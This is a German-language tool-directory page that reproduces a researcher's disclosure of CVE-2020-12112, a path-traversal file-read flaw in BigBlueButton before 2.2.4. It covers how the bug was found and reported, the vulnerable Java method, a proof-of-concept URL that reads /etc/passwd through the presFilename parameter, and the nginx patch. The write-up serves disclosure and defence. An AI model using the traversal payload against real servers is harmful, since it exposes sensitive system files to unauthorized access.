Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-12112 — BigBlueButton-Versionen unter 2.2.4 weisen eine LFI-Sicherheitslücke auf, die Zugriff auf sensible Dateien ermöglicht. 🚨 | Kitploit
Tools/GitHubGitHub/tchenu/cve-2020-12112
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubtchenu/cve-2020-12112

CVE-2020-12112

BigBlueButton-Versionen unter 2.2.4 weisen eine LFI-Sicherheitslücke auf, die Zugriff auf sensible Dateien ermöglicht. 🚨

Repository anzeigen
14vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-12112 🚨

BigBlueButton-Versionen unter 2.2.4 weisen eine LFI-Schwachstelle auf, die den Zugriff auf sensible Dateien ermöglicht.

Geschichte 📜

Während eines Fernlehrgangs auf einer BigBlueButton-Instanz teilte ein Student aus meiner Klasse den Link zur Folienpräsentation meines Lehrers, und mir fiel auf, dass der Dateiname in der URL enthalten war.

Slack der Schule

root@kitploit:~
Student: „Kein Grund, Notizen zu schreiben, ich habe die Folie."
Ich: Nun ja, ich habe einen Sicherheitsbericht zu schreiben. 😂

Indem ich ein wenig damit herumspielte, konnte ich auf die Datei /etc/passwd des Servers zugreifen und die Existenz einer Sicherheitslücke in der Open-Source-Lösung Big Blue Button entdecken.

Ich meldete die Schwachstelle, und das BBB-Team antwortete mir schnell und schloss die Sicherheitslücke (es dauerte nur wenige Tage).

Poc 🧙

root@kitploit:~
public File getDownloadablePresentationFile(String meetingId, String presId, String presFilename) {
	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);

    File presDir = Util.getPresentationDir(presentationBaseDir, meetingId, presId);
    return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
}

https://github.com/bigbluebutton/bigbluebutton/blob/v2.2.3/bbb-common-web/src/main/java/org/bigbluebutton/api/RecordingService.java#L90

Wie Sie sehen können, ermöglicht diese von einem PresentationController verwendete Methode das Herunterladen einer Präsentationsdatei durch Verkettung von 3 Parametern.

  • Absoluter Pfad der Datei
  • Ein Trennzeichen
  • Dateiname

Dies ermöglicht Links wie diesen:

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500.pdf

Um die Schwachstelle auszunutzen, genügt es, einen gültigen Link zu einer Präsentationsdatei zu erhalten und den Parameter presFilename zu ändern, um auf sensible Dateien zuzugreifen.

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=../../../../../etc/passwd

/etc/passwd-Datei

Patch 🤕

Das BBB-Team schloss die Schwachstelle in Version 2.2.4 über eine Serverkonfigurationsregel (HTTP), einen regulären Ausdruck und ein präzises Dateinamenformat.

root@kitploit:~
		location /bigbluebutton/presentation/download {
			return 404;
		}

		location ~ "^/bigbluebutton/presentation/download\/[0-9a-f]+-[0-9]+/[0-9a-f]+-[0-9]+$" {
			if ($arg_presFilename !~ "^[0-9a-f]+-[0-9]+\.[0-9a-zA-Z]+$") {
				return 404;
			}
			proxy_pass         http://127.0.0.1:8090$uri$is_args$args;
			proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
			# Workaround IE refusal to set cookies in iframe
			add_header P3P 'CP="No P3P policy available"';
		}

https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c#diff-c7d77969a4547b5349e55c5466948a27R45

Referenzen 🔍

  • https://nvd.nist.gov/vuln/detail/CVE-2020-12112
  • https://github.com/bigbluebutton/bigbluebutton/blob/master/bigbluebutton-web/grails-app/controllers/org/bigbluebutton/web/controllers/PresentationController.groovy
  • https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c
  • https://twitter.com/thibeault_chenu/status/1249976515917422593
  • https://twitter.com/bigbluebutton/status/1252706369486180353
Tool herunterladen